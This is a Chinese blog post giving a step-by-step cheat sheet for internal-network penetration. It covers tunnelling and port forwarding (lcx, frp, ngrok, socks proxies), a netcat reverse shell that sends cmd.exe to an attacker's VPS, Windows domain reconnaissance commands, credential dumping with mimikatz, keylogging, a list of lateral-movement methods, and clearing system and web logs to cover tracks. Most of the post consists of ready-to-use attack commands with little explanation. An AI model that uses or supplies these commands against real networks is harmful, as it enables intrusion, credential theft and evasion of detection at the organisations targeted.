浅谈内网渗透流程

  1. 浅谈内网渗透流程
    1. 0x01 内网转发
      1. lcx 内网端口转发
      2. socks
      3. nc反弹
      4. Frp
      5. ngrok
    2. 0x02 信息收集
      1. 域信息
      2. 其他
    3. 0x03 横向移动
    4. 0x04 收尾工程

浅谈内网渗透流程

0x01 内网转发

lcx 内网端口转发

Lcx内网端口转发
• lcx.exe -slave vps 3333 127.0.0.1 3389 //把主机的3389端口转发到vps的3333端口
• lcx.exe –listen 3333 4444 //监听3333端口,并将3333的请求转发给4444端口

本地端口转发
• Lcx.exe –tran 21 主机IP 3389 //将3389端口转发到21端口

通常时候内网的防火墙把3389端口ban了,无法作为端口转发出去,这个时候应该吧端口转发成21或者80端口,这些端口是有放行策略的,

socks

客户端执行:

agent_windows_x86.exe -l  4444

管理端执行:

admin_windows_x86.exe -c 127.0.0.1 -p 4444

将新的agent加入拓扑:

agent_windows_x86.exe -c 127.0.0.1 -p 4444

具体使用方法可参考: http://rootkiter.com/Termite/README.txt

  • S5.py //配合Proxifier一起使用

  • reGeorg //通过webshell 建立一个 socks 代理进行内网穿透

    s

nc反弹

反向连接
• nc -lvp 4444 //vps上执行
• nc -t -e cmd.exe vps 4444 //-t 参数是指通过telnet模式执行cmd.exe
正向代理
• nc -l -p 4444 -t -e cmd.exe //vps上
• nc -vv vps 4444 //本地执行

Frp

frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。

工具地址: https://github.com/fatedier/frp

frp 的作用

利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。

对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。

利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。

启动frp服务器端:

frps.exe -c frps.ini

浏览器访问: 127.0.0.1:7500,输入frps.ini中配置的用户名和密码即可进入控制面板:

ngrok

这里仅简单演示下Windows平台上的使用:

首先在内网主机上执行(内网主机需安装Python):

python -m SimpleHTTPServer 8089

我这里在Windows下用Python 2.7来演示,就执行:

py -2 -m SimpleHTTPServer 8089

内网渗透之端口转发与代理

将ngrok上传至内网主机并启动ngrok:

ngrok.exe http 8089

内网渗透之端口转发与代理

这时我们只需要在浏览器中访问:

http://cdb0e21b.ngrok.io
或者

https://cdb0e21b.ngrok.io

即可通过HTTP或者HTTPS来访问内网主机上的文件。

当然ngrok还有很多其他功能,更多使用方法请参考官方文档: https://ngrok.com/docs

0x02 信息收集

域信息

query user || qwinsta 查看当前在线用户

net user 查看本机用户

net user /domain 查看域用户

net view & net group “domain computers” /domain 查看当前域计算机列表 第二个查的更多

net view /domain 查看有几个域

net view \\dc 查看 dc 域内共享文件

net group /domain 查看域里面的组

net group “domain admins” /domain 查看域管

net localgroup administrators /domain /这个也是查域管,是升级为域控时,本地账户也成为域管

net group “domain controllers” /domain 域控

net time /domain

net config workstation 当前登录域 - 计算机名 - 用户名

net use \\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源

ipconfig

systeminfo

tasklist /svc

tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist

net localgroup administrators && whoami 查看当前是不是属于管理组

netstat -ano

nltest /dclist:xx 查看域控

whoami /all 查看 Mandatory Label uac 级别和 sid 号

net sessoin 查看远程连接 session (需要管理权限)

net share 共享目录

cmdkey /l 查看保存登陆凭证

echo %logonserver% 查看登陆域

spn –l administrator spn 记录

set 环境变量

dsquery server - 查找目录中的 AD DC/LDS 实例

dsquery user - 查找目录中的用户

dsquery computer 查询所有计算机名称 windows 2003

dir /s *.exe 查找指定目录下及子目录下没隐藏文件

arp -a

其他

Windows密码 //收集管理员信息

mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

破解lm密码使用:http://www/object_security.ch/en/opcrack.php

token::elevate

lsadump::sam

lsadump::secrets

exit

wifi 密码:

• Mysql等数据库密码

• 浏览器保存密码

• 浏览器历史记录

• 远程桌面历史记录

• 查找文件

• 键盘记录

keyscan_start

keyscan_dump

• 中间人

0x03 横向移动

• 端口扫描

• 命令执行

• SQL注入

• 文件上传

• 密码爆破

• 各类CVE

0x04 收尾工程

痕迹清理

系统日志 //%systemroot%system32configSecEvent.EVT
• 应用程序日志 //%systemroot%system32configAppEvent.EVT
• FTP日志 //%systemroot%system32logfilesmsftpsvc1
• WWW日志 //%systemroot%system32logfilesw3svc1

参考文章

http://www.freebuf.com/articles/web/170970.html

https://mp.weixin.qq.com/s/U2MqcjA_YmMlajJzvDCZZw

https://www.anquanke.com/post/id/92646


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:浅谈内网渗透流程

文章字数:1,160

本文作者:Mang0

发布时间:2018-10-09, 10:50:44

最后更新:2018-12-08, 01:19:49

原始链接:http://mang0.me/archis/17ef10d7/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏